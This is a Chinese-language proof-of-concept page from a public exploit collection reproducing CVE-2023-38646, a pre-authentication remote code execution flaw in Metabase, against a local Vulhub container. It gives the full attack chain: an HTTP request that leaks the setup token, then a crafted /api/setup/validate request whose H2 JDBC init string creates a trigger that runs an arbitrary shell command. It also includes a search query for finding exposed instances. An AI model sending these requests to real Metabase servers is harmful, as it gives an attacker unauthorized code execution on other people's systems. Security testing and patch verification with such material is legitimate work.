admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 20:06:03 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/Metabase 未授权 JDBC 远程代码执行漏洞 CVE-2023-38646.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

93 lines
2.7 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Metabase 未授权 JDBC 远程代码执行漏洞 CVE-2023-38646
## 漏洞描述
Metabase是一个开源的数据分析平台。在其0.46.6版本及以前存在一处远程代码执行漏洞未授权的用户可以使用JDBC注入在服务器上执行任意代码。
参考链接:
- https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/
- https://blog.calif.io/p/reproducing-cve-2023-38646-metabase
- https://mp.weixin.qq.com/s/MgfIyq0OJwnKOUF2kBB7TA
## 网络测绘
```
app="Metabase"
```
## 环境搭建
Vulhub执行如下命令启动一个Metabase server 0.46.6
```
docker compose up -d
```
服务启动后,访问`http://your-ip:3000`可以查看到Metabase的安装引导页面填写初始账号密码并且跳过后续的数据库填写的步骤即可完成安装
![image-20230803144456721](images/image-20230803144456721.png)
## 漏洞复现
首先,需要先访问`/api/session/properties`来获取Metabase的`setup-token`
```
GET /api/session/properties HTTP/1.1
Host: your-ip:3000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36
Connection: close
Cache-Control: max-age=0
```
![image-20230803145405274](images/image-20230803145405274.png)
要利用漏洞必须要获取这个Token。
接着,将刚才获取的`[setup-token]`替换进下面这个请求后发送:
```
POST /api/setup/validate HTTP/1.1
Host: your-ip:3000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 739
{
"token": "[setup-token]",
"details":
{
"is_on_demand": false,
"is_full_sync": false,
"is_sample": false,
"cache_ttl": null,
"refingerprint": false,
"auto_run_queries": true,
"schedules":
{},
"details":
{
"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;",
"advanced-options": false,
"ssl": true,
"init": "CREATE TRIGGER shell3 BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\u000A\u0009java.lang.Runtime.getRuntime().exec('touch /tmp/success')\u000A$$"
},
"name": "an-sec-research-team",
"engine": "h2"
}
}
```
![image-20230803150105927](images/image-20230803150105927.png)
虽然 response code 为 400但可以看到`touch /tmp/success`已成功在Metabase容器中执行
![image-20230803150134198](images/image-20230803150134198.png)
Reference in New Issue View Git Blame Copy Permalink